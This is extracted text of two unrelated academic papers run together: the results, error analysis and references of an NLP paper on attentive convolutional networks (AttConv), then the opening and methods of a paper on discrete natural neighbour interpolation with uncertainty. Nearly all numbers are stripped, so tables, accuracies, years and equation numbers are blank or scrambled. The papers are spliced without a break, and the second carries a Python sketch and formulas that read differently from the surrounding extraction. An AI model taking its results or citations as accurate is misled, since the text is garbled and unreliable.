(unsupervised sentence rep- resentation learning), bilstm, and cnn. we also reimplement multichannelcnn (kim, ), recognized as a simple but surprisingly strong sentence modeler. (ii) with attention. a vanilla “attentive-lstm” by rocktäschel et al. ( ). “rnn self-attention” (lin et al., ) is di- rectly comparable to attconv: it also uses intra- context attention. “cnn+internal attention” (adel and schütze, ), an intra-context attention idea similar to, but less complicated than, lin et al. ( ). abcnn & apcnn – cnns with atten- tive pooling. results and analysis. table shows that advanced-attconv surpasses its “light” coun- terpart, and obtains significant improvement over the state of the art. indices of sorted text groups . . . . . . . a c c multichannelcnn attconv . +diff of two curves figure : attconv vs. multichannelcnn for groups of yelp text with ascending text lengths. attconv performs more robustly across different lengths of text. in addition, attconv surpasses attentive pool- ing (abcnn&apcnn) with a big margin (> %) and outperforms the representative attentive-lstm (> %). furthermore, it outperforms the two self- attentive models: cnn+internal attention (adel and schütze, ) and rnn self-attention (lin et al., ), which are specifically designed for single-sentence modeling. adel and schütze ( ) generate an attention weight for each cnn hidden state by a linear transformation of the same hidden state, then compute weighted average over all hidden states as the text representation. lin et al. 
( ) extend that idea by generating a group of attention weight vectors, then rnn hid- den states are averaged by those diverse weighted vectors, allowing extracting different aspects of the text into multiple vector representations. both works are essentially weighted mean pooling, sim- ilar to the attentive pooling in yin et al. ( ) and dos santos et al. ( ). next, we compare attconv with multichan- nelcnn, the strongest baseline system (“w/o attention”), for different length ranges to check whether attconv can really encode long-range context effectively. we sort the , test instances by length, then split them into groups, each consisting of instances. figure shows per- formance of attconv vs. multichannnelcnn. we observe that attconv consistently outper- forms multichannelcnn for all lengths. further- more, the improvement over multichannelcnn generally increases with length. this is evidence that attconv more effectively models long text. #instances #entail #neutral train , , , dev , test , , total , , , table : statistics of scitail data set. systems acc w /o at te nt io n majority class . w/o context . bi-lstm . ngram model . bi-cnn . w it h at te nt io n enhanced lstm . attentive-lstm . decomp-att . dgem . apcnn . abcnn . attconv-light . w/o convolution . attconv-advanced . table : attconv vs. baselines on scitail. this is likely because of attconv’s capability to encode broader context in its filters. . sentence modeling with a single context: textual entailment data set. scitail (khot et al., ) is a textual entailment benchmark designed specifically for a real-world task: multi-choice question answering. all hypotheses tx were obtained by rephrasing (question, correct answer) pairs into single sen- tences, and premises ty are relevant web sentences retrieved by an information retrieval method. then the task is to determine whether a hypothesis is true or not, given a premise as context. all (tx, ty) pairs are annotated via crowdsourcing. accuracy is reported. table shows examples and table gives statistics. by this construction, a substantial performance improvement on scitail is equivalent to a better qa performance (khot et al., ). the hypoth- esis tx is the target sentence, and the premise ty acts as its context. baselines. apart from the common baselines (see section . ), we include systems covered by khot et al. ( ): (i) n-gram overlap: an overlap baseline, considering lexical granularity such as unigrams, one-skip bigrams, and one- skip trigrams. (ii) decomposable attention model (decomp-att) (parikh et al., ): explore atten- tion mechanisms to decompose the task into sub- tasks to solve in parallel. (iii) enhanced lstm (chen et al., b): enhance lstm by taking into account syntax and semantics from parsing information. (iv) dgem (khot et al., ): a decomposed graph entailment model, the current state-of-the-art. table presents results on scitail. (i) within attconv, “advanced” beats “light” by . %; (ii) “w/o convolution” and attentive pooling (i.e., abcnn & apcnn) get lower performances by %– %; (iii) more complicated attention mech- anisms equipped into lstm (e.g., “attentive- lstm” and “enhanced-lstm”) perform even worse. error analysis. to better understand the attconv in scitail, we study some error cases listed in table . language conventions. 
pair # uses sequen- tial commas (i.e., in “the egg, larva, pupa, and adult”) or a special symbol sequence (i.e., in “egg −> larva −> pupa −> adult”) to form a set or sequence; pair # has “a (or b)” to express the equivalence of a and b. this challenge is expected to be handled by dnns with specific training signals. knowledge beyond the text ty. in # , “be- cause smaller amounts of water evaporate in the cool morning” cannot be inferred from the premise ty directly. the main challenge in # is to dis- tinguish “weight” from “force,” which requires background physical knowledge that is beyond the presented text here and beyond the expressivity of word embeddings. complex discourse relation. the premise in # has an “or” structure. in # , the inserted phrase “with about , species” makes the connection between “nonvascular plants” and “the mosses, liverworts, and hornworts” hard to detect. both instances require the model to decode the dis- course relation. attconv on snli. table shows the com- parison. we observe that: (i) classifying hypothe- ses without looking at premises, that is, “w/o context” baseline, results in a large improvement over the “majority baseline.” this verifies the strong bias in the hypothesis construction of the snli data set (gururangan et al., ; poliak et al., ). (ii) attconv (advanced) surpasses # (premise ty, hypothesis tx) pair g/p challenge (ty) these insects have life stages, the egg, larva, pupa, and adult. / language conventions (tx) the sequence egg −> larva −> pupa −> adult shows the life cycle of some insects. (ty) . . . the notochord forms the backbone (or vertebral column). / language conventions(tx) backbone is another name for the vertebral column. (ty) water lawns early in the morning . . . prevent evaporation. / beyond text(tx) watering plants and grass in the early morning is a way to conserve water because smaller amounts of water evaporate in the cool morning. (ty) . . . the si unit . . . for force is the newton (n) and is defined as (kg·m/s− ). / beyond text (tx) newton (n) is the si unit for weight. (ty) heterotrophs get energy and carbon from living plants or animals (consumers) or from dead organic matter (decomposers). / discourse relation (tx) mushrooms get their energy from decomposing dead organisms. (ty) . . . are a diverse assemblage of three phyla of nonvascular plants, with / discourse relation about , species, that includes the mosses, liverworts, and hornworts. (tx) moss is best classified as a nonvascular plant. table : error cases of attconv in scitail. “. . . ”: truncated text. “g/p”: gold/predicted label. systems #para acc w /o at te nt io n majority class . w/o context (i.e., hypothesis only) k . bi-lstm (bowman et al., ) k . bi-cnn k . tree-cnn (mou et al., ) . m . nes (munkhdalai and yu, ) . m . w it h at te nt io n attentive-lstm (rocktäschel) k . self-attentive (lin et al., ) m . match-lstm (wang and jiang) . m . lstmn (cheng et al., ) . m . decomp-att (parikh) k . enhanced lstm (chen et al., b) . m . abcnn (yin et al., ) k . apcnn (dos santos et al., ) k . attconv – light k . w/o convolution k . attconv – advanced k . state-of-the-art (peters et al., ) m . table : performance comparison on snli test. en- semble systems are not included. all “w/o attention” baselines and “with attention” cnn baselines (i.e., attentive pooling), obtaining a performance ( . %) that is close to the state of the art ( . %). we also report the parameter size in snli as most baseline systems did. 
table shows that, in comparison to these baselines, our attconv (light and advanced) has a more lim- ited number of parameters, yet its performance is competitive. visualization. in figure , we visualize the attention mechanisms explored in attentive con- volution (figure (a)) and attentive pooling (figure (b)). figure (a) explores the visualization of two kinds of features learned by light attconv in snli data set (most are short sentences with rich phrase-level reasoning): (i) ei,j in equa- tion ( ) (after softmax), which shows the attention distribution over context ty by the hidden state hxi in sentence t x; (ii) hxi,new in equation ( ) for i = , , · · · , |tx|; it shows the context- aware word features in tx. by the two visual- ized features, we can identify which parts of the context ty are more important for a word in sen- tence tx, and a max-pooling, over those context- driven word representations, selects and forwards dominant (word, leftcontext, rightcontext, attcontext) combinations to the final decision maker. figure (a) shows the features of sentence tx = “a dog jumping for a frisbee in the snow” con- ditioned on the context ty = “an animal is out- side in the cold weather, playing with a plastic toy.” observations: (i) the right figure shows that the attention mechanism successfully aligns some cross-sentence phrases that are informative to the textual entailment problem, such as “dog” to “animal” (i.e., cxdog ≈ “animal”), “frisbee” to “plastic toy” and “playing” (i.e., cxfrisbee ≈ “plastic toy”+“playing”); (ii) the left figure shows a max-pooling over the generated features of filter_ and filter_ will focus on the context- aware phrases (a, dog, jumping, cxdog) and (a, for simplicity, we show out of attconv filters. a dog for a in the .snow ju m pi ng fr is be e c x dog c x fris. an in cold ,is the with toy .a an im al ou ts id e w ea th er pl ay in g pl as tic t x t y (a) visualization for features generated by attconv’s filters on sentence tx and ty. a max-pooling, over filter_ , locates the phrase (a, dog, jumping, cxdog), and locates the phrase (a, frisbee, in, c x f risbee) via filter_ . “c x dog” (resp. c x f ris.)—the attentive context of “dog” (resp. “frisbee”) in tx—mainly comes from “animal” (resp. “toy” and “playing”) in ty. a dog for a in the .snow ju m pi ng fr is be e an in cold ,is the with toy .a an im al ou ts id e w ea th er pl ay in g pl as tic t x t y convolution output (filter width= ) (b) attention visualization for attentive pooling (abcnn). based on the words in tx and ty, first, a convolution layer with filter width outputs hidden states for each sentence, then each hidden state will obtain an attention weight for how well this hidden state matches towards all the hidden states in the other sentence, and finally all hidden states in each sentence will be weighted and summed up as the sentence representation. this visualization shows that the spans “dog jumping for” and “in the snow” in tx and the spans “animal is outside” and “in the cold” in ty are most indicative to the entailment reasoning. figure : attention visualization for attentive convolution (top) and attentive pooling (bottom) between sentence tx = “a dog jumping for a frisbee in the snow” (left) and sentence ty = “an animal is outside in the cold weather, playing with a plastic toy” (right). frisbee, in, cxfrisbee) respectively; the two phrases are crucial to the entailment reasoning for this (ty, tx) pair. 
figure (b) shows the phrase-level (i.e., each consecutive trigram) attentions after the convolu- tion operation. as figure shows, a subsequent pooling step will weight and sum up those phrase- level hidden states as an overall sentence represen- tation. so, even though some phrases such as “in the snow” in tx and “in the cold” in ty show im- portance in this pair instance, the final sentence representation still (i) lacks a fine-grained phrase- to-phrase reasoning, and (ii) underestimates some indicative phrases such as “a dog” in tx and “an animal” in ty. briefly, attentive convolution first performs phrase-to-phrase, inter-sentence reasoning, then composes features; attentive pooling composes #supported #refuted #nei train , , , dev , , , test , , , table : statistics of claims in the fever data set. phrase features as sentence representations, then performs reasoning. intuitively, attentive convo- lution better fits the way humans conduct entail- ment reasoning, and our experiments validate its superiority—it is the hidden states of the aligned phrases rather than their matching scores that support better representation learning and decision-making. the comparisons in both scitail and snli show that: • cnns with attentive convolution (i.e., attconv) outperform the cnns with at- tentive pooling (i.e., abcnn and apcnn); • some competitors got over-tuned on snli while demonstrating mediocre performance in scitail—a real-world nlp task. our sys- tem attconv shows its robustness in both benchmark data sets. . sentence modeling with multiple contexts: claim verification data set. for this task, we use fever (thorne et al., ); it infers the truthfulness of claims by extracted evidence. the claims in fever were manually constructed from the introductory sec- tions of about k popular wikipedia articles in the june dump. claims have . tokens on average. table lists the claim statistics. in addition to claims, fever also provides a wikipedia corpus of approximately . million ar- ticles, from which gold evidences are gathered and provided. figure shows the distributions of sen- tence sizes in fever’s ground truth evidence set (i.e., the context size in our experimental set-up). we can see that roughly % of evidence instances cover more than one sentence and roughly % cover more than two sentences. each claim is labeled as supported, re- futed, or notenoughinfo (nei) given the gold evidence. the standard fever task also explores the performance of evidence extraction, evaluated by f between extracted evidence and gold evidence. this work focuses on the claim en- tailment part, assuming the evidences are provided (extracted or gold). more specifically, we treat a claim as tx, and its evidence sentences as context ty. > #context for each claim sentence ... % . . . . . . . . . . . figure : distribution of #sentence in fever evi- dence. this task has two evaluations: (i) all— accuracy of claim verification regardless of the validness of evidence; (ii) subset—verification accuracy of a subset of claims, in which the gold evidence for supported and refuted claims must be fully retrieved. we use the official eval- uation toolkit. set-ups. (i) we adopt the same retrieved evi- dence set (i.e, contexts ty) as thorne et al. ( ): top- most relevant sentences from top- retrieved wiki pages by a document retriever (chen et al., a). the quality of this evidence set against the ground truth is: . (recall), . (precision), . (f ) on dev, and . (recall), . (pre- cision), . (f ) on test. 
this set-up challenges our system with potentially unrelated or even mis- leading context. (ii) we use the ground truth evi- dence as context. this lets us determine how far our attconv can go for this claim verification problem once the accurate evidence is given. baselines. we first include the two systems ex- plored by thorne et al. ( ): (i) mlp: a multi- layer perceptron baseline with a single hidden layer, based on tf-idf cosine similarity between the claim and the evidence (riedel et al., ); (ii) decomp-att (parikh et al., ): a decompos- able attention model that is tested in scitail and snli before. note that both baselines first relied on an information retrieval system to extract the top- relevant sentences from the retrieved top- wiki pages as evidence for claims, then concate- nated all evidence sentences as a longer context for a claim. https://github.com/sheffieldnlp/fever- scorer. https://github.com/sheffieldnlp/fever-scorer https://github.com/sheffieldnlp/fever-scorer retrie. evi. gold system all sub evi. de v mlp . . . bi-cnn . . . apcnn . . . abcnn . . . attentive-lstm . . . decomp-att . . . attconv light,context-wise . . . w/o conv. . . . light,context-conc . . . w/o conv. . . . advan.,context-wise . . . advan.,context-conc . . . te st (thorne et al., ) . . – attconv . . . table : performance on dev and test of fever. in “gold evi.” scenario, all subset are the same. we then consider two variants of our attconv in dealing with modeling of tx with variable-size context ty. (i) context-wise: we first use all evidence sentences one by one as context ty to guide the representation learning of the claim tx, generating a group of context-aware representation vectors for the claim, then we do element-wise max-pooling over this vector group as the final representation of the claim. (ii) context-conc: concatenate all evidence sentences as a single piece of context, then model the claim based on this context. this is the same preprocessing step as thorne et al. ( ) did. results. table compares our attconv in dif- ferent set-ups against the baselines. first, attconv surpasses the top competitor “decomp-att,” reported in thorne et al. ( ), with big mar- gins in dev (all: . vs. . ) and test (all: . vs. . ). in addition, “advanced- attconv” consistently outperforms its “light” counterpart. moreover, attconv surpasses at- tentive pooling (i.e., abcnn & apcnn) and “attentive-lstm” by > % in all, > % in sub and > % in “gold evi.” figure further explores the fine-grained per- formance of attconv for different sizes of gold evidence (i.e., different sizes of context ty). the system shows comparable performances for sizes and . even for context sizes larger than , it only drops by %. > gold #context for each claim . . . . . . . . ac c (% ) figure : fine-grained attconv performance given variable-size golden fever evidence as claim’s con- text. these experiments on claim verification clearly show the effectiveness of attconv in sen- tence modeling with variable-size context. this should be attributed to the attention mechanism in attconv, which enables a word or a phrase in the claim tx to “see” and accumulate all related clues even if those clues are scattered across mul- tiple contexts ty. error analysis. we do error analysis for “re- trieved evidence” scenario. error case # is due to the failure of fully re- trieving all evidence. 
for example, a successful support of the claim “weekly idol has a host born in the year ” requires the information compo- sition from three evidence sentences, two from the wiki article “weekly idol,” and one from “jeong hyeong-don.” however, only one of them is retrieved in the top- candidates. our system pre- dicts refuted. this error is more common in instances for which no evidence is retrieved. error case # is due to the insufficiency of rep- resentation learning. consider the wrong claim “corsica belongs to italy” (i.e., in refuted class). even though good evidence is retrieved, the system is misled by noise evidence: “it is located . . . west of the italian peninsula, with the nearest land mass being the italian island . . . ”. error case # is due to the lack of advanced data preprocessing. for a human, it is very easy to “re- fute” the claim “telemundo is an english-language television network” by the evidence “telemundo is an american spanish-language terrestrial tele- vision . . . ” (from the “telemundo” wikipage), by checking the keyphrases: “spanish-language” vs. “english-language.” unfortunately, both tokens are unknown words in our system; as a result, they do not have informative embeddings. a more careful data preprocessing is expected to help. summary we presented attconv, the first work that en- ables cnns to acquire the attention mechanism commonly used in rnns. attconv combines the strengths of cnns with the strengths of the rnn attention mechanism. on the one hand, it makes broad and rich context available for prediction, either context from external inputs (extra-context) or internal inputs (intra-context). on the other hand, it can take full advantage of the strengths of convolution: it is more order- sensitive than attention in rnns and local-context information can be powerfully and efficiently modeled through convolution filters. our experi- ments demonstrate the effectiveness and flexibil- ity of attconv when modeling sentences with variable-size context. acknowledgments we gratefully acknowledge funding for this work by the european research council (erc # ). we would like to thank the anonymous reviewers for their helpful comments. references heike adel and hinrich schütze. . exploring different dimensions of attention for uncertainty detection. in proceedings of eacl, pages – , valencia, spain. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in pro- ceedings of iclr, san diego, usa. samuel r. bowman, gabor angeli, christopher potts, and christopher d. manning. . a large annotated corpus for learning natural lan- guage inference. in proceedings of emnlp, pages – , lisbon, portugal. danqi chen, adam fisch, jason weston, and antoine bordes. a. reading wikipedia to answer open-domain questions. in proceedings of acl, pages – , vancouver, canada. qian chen, xiaodan zhu, zhen-hua ling, si wei, hui jiang, and diana inkpen. b. enhanced lstm for natural language inference. in pro- ceedings of acl, pages – , vancouver, canada. jianpeng cheng, li dong, and mirella lapata. . long short-term memory-networks for machine reading. in proceedings of emnlp, pages – , austin, usa. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel p. kuksa. . natural language processing (almost) from scratch. journal of machine learning research, : – . ido dagan, dan roth, mark sammons, and fabio massimo zanzotto. . recognizing textual entailment: models and applications. 
synthesis lectures on human language tech- nologies. morgan & claypool. john duchi, elad hazan, and yoram singer. . adaptive subgradient methods for online learn- ing and stochastic optimization. journal of ma- chine learning research, : – . jeffrey l. elman. . finding structure in time. cognitive science, ( ): – . jonas gehring, michael auli, david grangier, denis yarats, and yann n. dauphin. . convolutional sequence to sequence learning. in proceedings of icml, pages – , sydney, australia. alex graves. . generating sequences with re- current neural networks. corr, abs/ . . alex graves, greg wayne, and ivo danihelka. . neural turing machines. corr, abs/ . . suchin gururangan, swabha swayamdipta, omer levy, roy schwartz, samuel r. bowman, and noah a. smith. . annotation artifacts in natural language inference data. in proceedings of naacl-hlt, pages – , new orleans, usa. karl moritz hermann, tomás kociský, edward grefenstette, lasse espeholt, will kay, mustafa suleyman, and phil blunsom. . teach- ing machines to read and comprehend. in pro- ceedings of nips, pages – , montreal, canada. nal kalchbrenner, edward grefenstette, and phil blunsom. . a convolutional neural net- work for modelling sentences. in proceedings of acl, pages – , baltimore, usa. tushar khot, ashish sabharwal, and peter clark. . scitail: a textual entailment dataset from science question answering. in proceed- ings of aaai, pages – , new orleans, usa. yoon kim. . convolutional neural networks for sentence classification. in proceedings of emnlp, pages – , doha, qatar. yoon kim, carl denton, luong hoang, and alexander m. rush. . structured atten- tion networks. in proceedings of iclr, toulon, france. ankit kumar, ozan irsoy, peter ondruska, mohit iyyer, james bradbury, ishaan gulrajani, victor zhong, romain paulus, and richard socher. . ask me anything: dynamic memory networks for natural language process- ing. in proceedings of icml, pages – , new york city, usa. quoc le and tomas mikolov. . distributed representations of sentences and documents. in proceedings of icml, pages – , beijing, china. yann lecun, léon bottou, yoshua bengio, and patrick haffner. . gradient-based learning applied to document recognition. proceedings of the ieee, ( ): – . jiwei li, minh-thang luong, and dan jurafsky. . a hierarchical neural autoencoder for paragraphs and documents. in proceedings of acl, pages – , beijing, china. jindrich libovický and jindrich helcl. . at- tention strategies for multi-source sequence- to-sequence learning. in proceedings of acl, pages – , vancouver, canada. zhouhan lin, minwei feng, cícero nogueira dos santos, mo yu, bing xiang, bowen zhou, and yoshua bengio. . a structured self- attentive sentence embedding. in proceedings of iclr, toulon, france. minh-thang luong, hieu pham, and christopher d. manning. . effective approaches to attention-based neural machine translation. in proceedings of emnlp, pages – , lisbon, portugal. yishu miao, lei yu, and phil blunsom. . neural variational inference for text processing. in proceedings of icml, pages – , new york city, usa. tomas mikolov, ilya sutskever, kai chen, gregory s. corrado, and jeffrey dean. . dis- tributed representations of words and phrases and their compositionality. in proceedings of nips, pages – , lake tahoe, usa. lili mou, rui men, ge li, yan xu, lu zhang, rui yan, and zhi jin. . natural language in- ference by tree-based convolution and heuristic matching. in proceedings of acl, pages – , berlin, germany. tsendsuren munkhdalai and hong yu. . 
neural semantic encoders. in proceedings of eacl, pages – , valencia, spain. ramesh nallapati, bowen zhou, cícero nogueira dos santos, Çaglar gülçehre, and bing xiang. . abstractive text summarization using sequence-to-sequence rnns and beyond. in pro- ceedings of conll, pages – , berlin, germany. ankur p. parikh, oscar täckström, dipanjan das, and jakob uszkoreit. . a decomposable attention model for natural language inference. in proceedings of emnlp, pages – , austin, usa. jeffrey pennington, richard socher, and christopher d. manning. . glove: global vectors for word representation. in proceedings of emnlp, pages – , doha, qatar. matthew e. peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep contextu- alized word representations. in proceedings of naacl-hlt, pages – , new orleans, usa. adam poliak, jason naradowsky, aparajita haldar, rachel rudinger, and benjamin van durme. . hypothesis only baselines in natural language inference. in proceedings of *sem, pages – , new orleans, usa. benjamin riedel, isabelle augenstein, georgios p. spithourakis, and sebastian riedel. . a simple but tough-to-beat baseline for the fake news challenge stance detection task. corr, abs/ . . tim rocktäschel, edward grefenstette, karl moritz hermann, tomáš kočiskỳ, and phil blunsom. . reasoning about entailment with neural attention. in proceedings of iclr, san juan, puerto rico. cícero nogueira dos santos, ming tan, bing xiang, and bowen zhou. . attentive pool- ing networks. corr, abs/ . . min joon seo, aniruddha kembhavi, ali farhadi, and hannaneh hajishirzi. . bidirectional attention flow for machine comprehension. in proceedings of iclr, toulon, france. lifeng shang, zhengdong lu, and hang li. . neural responding machine for short- text conversation. in proceedings of acl, pages – , beijing, china. rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. . training very deep networks. in proceedings of nips, pages – , montreal, canada. james thorne, andreas vlachos, christos christodoulopoulos, and arpit mittal. . fever: a large-scale dataset for fact extraction and verification. in proceedings of naacl- hlt, pages – , new orleans, usa. ashish vaswani, noam shazeer, niki parmar, jakob uszkoreit, llion jones, aidan n. gomez, lukasz kaiser, and illia polosukhin. . at- tention is all you need. in proceedings of nips, pages – , long beach, usa. shuohang wang and jing jiang. . learn- ing natural language inference with lstm. in proceedings of naacl-hlt, pages – , san diego, usa. shuohang wang and jing jiang. . machine comprehension using match-lstm and an- swer pointer. in proceedings of iclr, toulon, france. wenhui wang, nan yang, furu wei, baobao chang, and ming zhou. a. gated self- matching networks for reading comprehension and question answering. in proceedings of acl, pages – , vancouver, canada. zhiguo wang, wael hamza, and radu florian. b. bilateral multi-perspective matching for natural language sentences. in proceedings of ijcai, pages – , melbourne, australia. caiming xiong, stephen merity, and richard socher. . dynamic memory networks for visual and textual question answering. in pro- ceedings of icml, pages – , new york city, usa. caiming xiong, victor zhong, and richard socher. . dynamic coattention networks for question answering. in proceedings of iclr, toulon, france. wenpeng yin, hinrich schütze, bing xiang, and bowen zhou. . abcnn: attention-based convolutional neural network for modeling sen- tence pairs. tacl, : – . 
submitted may accepted june published july corresponding author thomas r. etherington, ethering- tont@landcareresearch.co.nz academic editor tianfeng chai additional information and declarations can be found on page doi . /peerj-cs. copyright etherington distributed under creative commons cc-by . open access discrete natural neighbour interpolation with uncertainty using cross-validation error-distance fields thomas r. etherington manaaki whenua—landcare research, lincoln, new zealand abstract interpolation techniques provide a method to convert point data of a geographic phenomenon into a continuous field estimate of that phenomenon, and have become a fundamental geocomputational technique of spatial and geographical analysts. natural neighbour interpolation is one method of interpolation that has several useful proper- ties: it is an exact interpolator, it creates a smooth surface free of any discontinuities, it is a local method, is spatially adaptive, requires no statistical assumptions, can be applied to small datasets, and is parameter free. however, as with any interpolation method, there will be uncertainty in how well the interpolated field values reflect actual phenomenon values. using a method based on natural neighbour distance based rates of error calculated for data points via cross-validation, a cross-validation error-distance field can be produced to associate uncertainty with the interpolation. virtual geography experiments demonstrate that given an appropriate number of data points and spatial-autocorrelation of the phenomenon being interpolated, the natural neighbour interpolation and cross-validation error-distance fields provide reliable estimates of value and error within the convex hull of the data points. while this method does not replace the need for analysts to use sound judgement in their interpolations, for those researchers for whom natural neighbour interpolation is the best interpolation option the method presented provides a way to assess the uncertainty associated with natural neighbour interpolations. subjects computational science, spatial and geographic information science keywords convex hull, digital, neighbor, python, raster, sibson, virtual geography experi- ments, voronoi diagram introduction spatially continuous geographic phenomena are often only measured at point locations. interpolation techniques provide a method to convert such point data into a continuous estimate of the phenomenon, and have become a fundamental computational technique of spatial and geographical analysts with key texts devoting large sections to interpolation methods (burrough & mcdonnell, ; o’sullivan & unwin, ; slocum et al., ). natural neighbour (or sibson) interpolation is an interpolation technique that was first presented by sibson ( ). the method is based upon a voronoi (or: dirichlet, thiessen) diagram that partitions space to identify those areas that are closest to a set of points (okabe et al., ). previous authors (sambridge, braun & mcqueen, ; watson, ) have noted several useful properties of natural neighbour interpolation: (i) the method is an how to cite this article etherington tr. . discrete natural neighbour interpolation with uncertainty using cross-validation error- distance fields. peerj comput. sci. :e http://doi.org/ . /peerj-cs. 
https://peerj.com/computer-science mailto:etheringtont@landcareresearch.co.nz mailto:etheringtont@landcareresearch.co.nz https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. exact interpolator, in that the original data values are retained at the reference data points; (ii) the method creates a smooth surface free from any discontinuities; (iii) the method is entirely local, as it is based on a minimal subset of data locations that excludes locations that, while close, are more distant than another location in a similar direction; and (iv) the method is spatially adaptive, automatically adapting to local variation in data density or spatial arrangement. to this list i would add: (v) there is no requirement to make statistical assumptions; (vi) the method can be applied to very small datasets as it is not statistically based; and (vii) the method is parameter free, so no input parameters that will affect the success of the interpolation need to be specified. these properties make natural neighbour interpolation particularly well suited for the interpolation of continuous geographic phenomena from data points that have a highly irregular spatial distribution. while the choice of an appropriate interpolation method will always vary on a case by case basis, studies comparing interpolation methodologies with climate and land surface data demonstrate that natural neighbour interpolation is a highly competitive and sometimes optimal technique (abramov & mcewan, ; bater & coops, ; hofstra et al., ; lyra et al., ; yilmaz, ). unfortunately, natural neighbour interpolation can be relatively slow in comparison to other methods (abramov & mcewan, ). the high computational cost arises from the need to insert a new point into the voronoi diagram for every cell that will make up the interpolation field, and this geometric process becomes increasingly difficult in higher dimensions (park et al., ). this has led to the development of discrete (or digital) natural neighbour interpolation that is significantly quicker than traditional approaches (park et al., ) and has been applied successfully in a geographical context (keller et al., ). while natural neighbour interpolation has various useful properties, and the discrete form is computationally scalable, there is a great deal of uncertainty associated with any interpolation. therefore, being able to associate interpolation estimates with some form of uncertainty would be highly desirable. previous efforts for natural neighbour interpolation have been based upon fitting statistical uncertainty models (bater & coops, ; ghosh, gelfrand & mlhave, ), but this approach is contrary to natural neighbour interpolation’s useful properties (v), (vi), and (vii). therefore, for those researchers who decide that for their data and objectives natural neighbour interpolation is the best interpolation option, i present an approach to associate the interpolation with a measure of uncertainty that is consistent with all the useful properties of natural neighbour interpolation. materials & methods discrete natural neighbour interpolation in the -dimensional planar context that is most relevant to geographical applications, discrete natural neighbour interpolation begins by calculating a discrete voronoi diagram. 
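a minimal python sketch of this first step is given below, ahead of the formal definitions that follow. it is an assumed illustration rather than the code released with this article: the function and array names (discrete_voronoi, data_rc) are hypothetical, and equidistant ties are resolved by the tree query here, whereas the text assigns such cells to the data cell with the smallest index.

```python
# a minimal sketch (not the paper's released code) of the discrete voronoi
# diagram v(p) and the distance-to-nearest-data-cell field d(p -> c) on a raster.
import numpy as np
from scipy.spatial import cKDTree

def discrete_voronoi(shape, data_rc):
    """shape: (rows, cols) of the raster; data_rc: (n, 2) row/col centres of the
    data cells. returns the index of the nearest data cell and its distance,
    one value per raster cell."""
    rows, cols = shape
    rr, cc = np.meshgrid(np.arange(rows), np.arange(cols), indexing="ij")
    cells = np.column_stack([rr.ravel(), cc.ravel()])   # centres of all raster cells
    dist, idx = cKDTree(data_rc).query(cells)            # nearest data cell per cell
    # note: ties are broken by the tree query, not by smallest data-cell index
    return idx.reshape(shape), dist.reshape(shape)

# hypothetical usage: five data cells on a 100 x 100 raster
data_rc = np.array([[10, 12], [80, 25], [40, 70], [90, 90], [5, 95]])
v_p, d_p_to_c = discrete_voronoi((100, 100), data_rc)
```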
first, a raster spatial domain $C$ of cells $c$ is defined such that $c \in C \subset \mathbb{R}^2$, and hence each $c$ has coordinate attributes $x, y$ for its centre, so all $c_i = \{x_i, y_i\}$. the data points are then used to define a set $P$ of $n$ data cells $P = \{p_1, p_2, p_3, \ldots, p_n\}$ where $P \subset C$, and each data cell has coordinate attributes for its cell centre $x, y$ and value $z$, so $p_i = \{x_i, y_i, z_i\}$. when multiple data points occur within a raster cell, the resulting data cell has a value $z$ that is the mean of all the data point values. the discrete voronoi polygon $V(p_i)$ that contains all the cells that are closest to each data cell can then be defined as

$V(p_i) = \{c \in C \mid d(c \rightarrow p_i) < d(c \rightarrow p_j) \;\; \forall\, j \neq i\}$ ( )

where $d(c \rightarrow p)$ is the euclidean distance between the centres of the cells $c$ and $p$. when $c$ is equally distant from more than one $p$, for convenience $c$ is assigned to the $p$ with smallest index. the set of $n$ discrete voronoi polygons then creates the discrete voronoi diagram

$V(P) = \{V(p_1), V(p_2), V(p_3), \ldots, V(p_n)\}$ ( )

that identifies which raster cells are closest to which data cells (fig. a) (okabe et al., ). in the process of calculating $V(P)$ another set $D(P \rightarrow C)$ that records the euclidean distance from the set of data cells $P$ to all raster cells $C$ (fig. b) is created. as each data cell $p_i$ has an associated value $z_i$, $V(P)$ can be used to interpolate the data cell values across the raster to produce $Z(P)$, which in a geographic information system (gis) context is equivalent to nearest neighbour interpolation (burrough & mcdonnell, ; tomlin, ) (fig. c). to interpolate the data cell values using natural neighbour interpolation, the set of euclidean distances from an interpolation cell $c_i$ to all raster cells $D(c_i \rightarrow C)$ is calculated (fig. d). then the discrete voronoi polygon for the interpolation cell $V(c_i)$ is defined as

$V(c_i) = \{c \in C \mid d(c_i \rightarrow c) \leq D(P \rightarrow c)\}$ ( )

that is the set of raster cells that are as close or closer to the interpolation cell than any data cell. the set $V(c_i)$ can then be used to find the set of relevant data cell values

$Z(c_i) = \{c \in Z(P) \mid c \in V(c_i)\}$ ( )

that will form the basis of the interpolation to that cell (fig. e). the natural neighbour interpolation estimate $\hat{z}$ is then calculated as

$\hat{z}(c_i) = \dfrac{\sum Z(c_i)}{\#\, Z(c_i)}$ ( )

where $\sum Z(c_i)$ is the sum of the cell values in $Z(c_i)$ and $\#\, Z(c_i)$ is the number of cells in the set $Z(c_i)$, hence $\hat{z}(c_i)$ is simply the mean of $Z(c_i)$. by calculating $\hat{z}(c_i)$ for all raster cells the natural neighbour interpolation is produced (fig. f).

calculating uncertainty

cross-validation error

global error estimation is a traditional approach to measure the uncertainty of geographic models (zhang & goodchild, ). given a set of $n$ paired observed $o$ and modelled $m$ values, the absolute error $e_i$ for each pair is $e_i = |m_i - o_i|$, and a global estimate of error using a method such as the mean absolute error (mae) is calculated as

$\mathrm{mae} = \dfrac{1}{n} \sum_{i=1}^{n} e_i$ ( )

figure discrete natural neighbour interpolation. (a) for a set $P$ of $n$ data cells $p$ the discrete voronoi diagram $V(P)$ defines which raster cells are closest to which data cells and (b) the distance to the closest data cell $D(P \rightarrow C)$. (c) $V(P)$ is used to interpolate the values $z$ of the data cells to produce $Z(P)$.
